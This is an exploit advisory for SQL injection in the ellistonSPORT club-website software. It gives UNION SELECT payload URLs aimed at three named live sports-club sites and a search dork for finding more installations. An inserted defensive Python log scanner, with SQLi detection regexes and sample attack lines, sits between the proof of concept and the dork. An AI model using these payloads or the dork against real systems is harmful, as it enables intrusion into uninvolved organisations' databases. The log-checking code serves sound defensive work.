[o] ellistonSPORT Multiple SQL Injection Vulnerabilities
Software : ellistonSPORT
Vendor : http://ellistonsport.com/
Demo : http://demo.ellistonsport.com/index.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.
[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php
[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]
[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--
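A defender-side log check, added here and not part of the advisory: it parses access-log request lines for the three scripts named above, decodes the id parameter, and flags any value that is not the integer those scripts expect, reporting separately when the decoded value has the tautology / UNION SELECT / comment shape of the proof-of-concept URLs. The sample log lines and the signature regex are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The three scripts the advisory names; each expects an integer ?id= parameter.
VULNERABLE_SCRIPTS = {"showPlayer.php", "showPage.php", "showNews.php"}
# Signatures matching the shape of the PoC URLs: tautology, UNION SELECT, comment terminator.
SQLI_SIGNATURE = re.compile(r"\bunion\b.*\bselect\b|\b(?:and|or)\b\s*\d+\s*=\s*\d+|--|/\*", re.I)
# Request line inside a Common Log Format entry: "GET /path?query HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')

def check_request(target):
    """Return (script, id_value, reason) for a suspicious request to a listed script, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in VULNERABLE_SCRIPTS:
        return None
    ids = parse_qs(parts.query, keep_blank_values=True).get("id")
    if not ids:
        return None
    value = ids[0].strip()  # parse_qs already decodes '+' and %XX escapes
    if re.fullmatch(r"-?\d+", value):
        return None  # a plain integer is the only value these scripts expect
    # "sqli-signature": decoded id matches an injection pattern; "non-integer-id": merely malformed
    reason = "sqli-signature" if SQLI_SIGNATURE.search(value) else "non-integer-id"
    return (script, value, reason)

def scan_log(lines):
    """Run check_request over access-log lines and return the list of findings."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m:
            hit = check_request(m.group(1))
            if hit:
                findings.append(hit)
    return findings

# Constructed sample lines (not real traffic); lines 2 and 3 follow the PoC shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /showPlayer.php?id=101 HTTP/1.1" 200 4321',
    '10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3 HTTP/1.1" 200 4321',
    '10.0.0.7 - - [01/Jan/2010:10:00:02 +0000] "GET /showNews.php?id=363%20AND%201=2%20UNION%20SELECT%201,2 HTTP/1.1" 200 1000',
    '10.0.0.8 - - [01/Jan/2010:10:00:03 +0000] "GET /index.php?id=1+UNION+SELECT+1 HTTP/1.1" 200 100',
    '10.0.0.9 - - [01/Jan/2010:10:00:04 +0000] "GET /showPage.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for script, value, reason in scan_log(SAMPLE_LOG):
        print(f"{reason}: {script} id={value!r}")
```

Requests to scripts outside the list (index.php in the sample) are ignored on purpose, so tune VULNERABLE_SCRIPTS to the deployment being reviewed.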
[o] Dork
"Powered by ellistonSPORT"
[o] Notes
This is a private script, and all targets are hosted on one IP address.